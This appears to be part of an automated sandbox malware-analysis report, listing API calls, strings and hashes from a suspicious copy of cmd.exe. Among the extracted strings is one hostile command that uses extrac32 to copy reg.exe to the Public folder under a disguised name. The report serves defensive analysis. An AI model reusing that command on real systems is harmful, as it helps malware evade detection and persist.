                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                    • API String ID: 2221118986-3416068913
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memsetwcschr
• String ID: 2$COMSPEC
• API String ID: 1764819092-1738800741
Uniqueness
• Uniqueness Score: -1.00%
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: wcschr$ErrorFileFindFirstLastwcsrchr
• String ID:
• API String ID: 4254246844-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _get_osfhandle$ConsoleMode
• String ID:
• API String ID: 1591002910-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: DriveType
• String ID: :
• API String ID: 338552980-336475711
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
  • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF789BD5B52
  • Part of subcall function 00007FF789BD4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4297
  • Part of subcall function 00007FF789BD4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD42D7
  • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD42FD
  • Part of subcall function 00007FF789BD4224: memset.MSVCRT ref: 00007FF789BD4368
  • Part of subcall function 00007FF789BD4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BD4380
  • Part of subcall function 00007FF789BD4224: wcsrchr.MSVCRT ref: 00007FF789BD43E6
  • Part of subcall function 00007FF789BD4224: lstrcmpW.KERNELBASE ref: 00007FF789BD4401
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF789BD5BC7
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID:
• API String ID: 346765439-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmalloc
• String ID:
• API String ID: 1412018758-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
• RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1357844191-0
                                                                                                                    • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                    • Instruction ID: cfd8712d1361f5e66fae49d95ca13ded6b832166a271b548b27737b374a85609
                                                                                                                    • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                    • Instruction Fuzzy Hash: 23F01D31A1874686EA44AF15F844478FBB5FB89F42BA89434D90E03394DF3DE441C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: exit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2483651598-0
                                                                                                                    • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction ID: 4dbe998938a1ccde1e2616bbed7b2ae8041d5d92cb94ab31587b1f58dbef165b
                                                                                                                    • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                    • Instruction Fuzzy Hash: 69C0123070464A47EB5C7F312495039AD757B09A12F585438C506812C2DD28D404C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF789BC6F97), ref: 00007FF789BD550C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DefaultLangUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 768647712-0
                                                                                                                    • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction ID: b3e7f2505f8ea5d480374330dc7198940b19325730d0eb0ab99fa22926170989
                                                                                                                    • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                    • Instruction Fuzzy Hash: 51E0C2A2D0A2578AF5553E41604A3B4AD73EB69F83FE44031C60E012C8D92D2841D228
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction ID: 3f443d25ecd08591b5cfbccd7b12d507137f4fd42834ccc0b0fcd27fd9ea5c3f
                                                                                                                    • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                    • Instruction Fuzzy Hash: 0DF0B421B097C941EA409B56B544129A6A1AF88FF0B988330EE7C47BC9DE3CD451C300
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F44
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE7F5C
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7F9E
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE7FFF
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8020
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8036
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8061
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8075
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80D6
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE80EA
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8177
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE819A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81BD
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81DC
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE81FB
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE821A
                                                                                                                    • _wcsnicmp.MSVCRT ref: 00007FF789BE8239
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8291
                                                                                                                    • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82D7
                                                                                                                    • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE82FB
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE831A
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8364
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8378
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE839A
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83AE
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE83E6
                                                                                                                    • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8403
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF789BE8418
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                    • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                    • API String ID: 3637805771-3100821235
                                                                                                                    • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                    • Instruction ID: 95a809d78b5f4528f460f3fc67a900cbc97e4ce3cb9e141c7831a23fb608451d
                                                                                                                    • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                                                                                    • Instruction Fuzzy Hash: 56E16C31A08A5A8AE710AF65A40417DFEB5FB49F96BE58234DD1E53790EF3CE444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                    • String ID: DPATH
                                                                                                                    • API String ID: 95024817-2010427443
                                                                                                                    • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                    • Instruction ID: f7e17d679d89f1c2506fcc1769d496c6e4458abb0e943576203c2e3d1857801c
                                                                                                                    • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                                                                                                    • Instruction Fuzzy Hash: AB12B632A086868AE764AF21944017DFFB5FB89FA6FA45135EA4E57794DF3CE400CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
                                                                                                                    • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                    • API String ID: 4111365348-3662956551
                                                                                                                    • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                    • Instruction ID: 938af7d0400e29b397411a3fa9f50ead7eebe23b0e677e4df856d82e3caf15e8
                                                                                                                    • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                    • Instruction Fuzzy Hash: 3CE1AE21A0864A86EB50AF65A8445BDFFB1FF84FAAFE44131D90E47695EE3CE504C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _wcsupr.MSVCRT ref: 00007FF789BEEF33
                                                                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEF98
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFA9
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFBF
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BEEFDC
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEEFED
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF003
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF022
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF083
                                                                                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF092
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF0A5
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BEF0DB
                                                                                                                    • wcschr.MSVCRT ref: 00007FF789BEF135
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF16C
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BEF185
                                                                                                                      • Part of subcall function 00007FF789BD01B8: _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
                                                                                                                      • Part of subcall function 00007FF789BD01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                    • String ID: <noalias>$CMD.EXE
                                                                                                                    • API String ID: 1161012917-1690691951
                                                                                                                    • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                    • Instruction ID: 522d4477c7e668436f625e1f33634c0789cca3cf7043065c4db2181d243407ee
                                                                                                                    • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                    • Instruction Fuzzy Hash: D9919E21B0965A8AFB14AF60E8101BDAEB4BF49F96FA48135DD0E52695EF3CE445C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                    • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\reg.exe C:\\Users\\Public\\ger.exe
                                                                                                                    • API String ID: 3863671652-4031031593
                                                                                                                    • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                                                                                                    • Instruction ID: d710025a6ff9975953b7bfcff9fd1356fb7ae6e7ee5b7dcbc4b2ce0f601362f0
                                                                                                                    • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                                                                                                    • Instruction Fuzzy Hash: 69E1AE25A0928A82FA60BF25D858379EAB0BF85FA6FF54435D90D027D1DF3CE845C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$BufferConsoleInfoScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1034426908-0
                                                                                                                    • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction ID: b2fa228b6b2128a86568e4075111c73df1b432c6a2fd37bde01896a7301dc641
                                                                                                                    • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
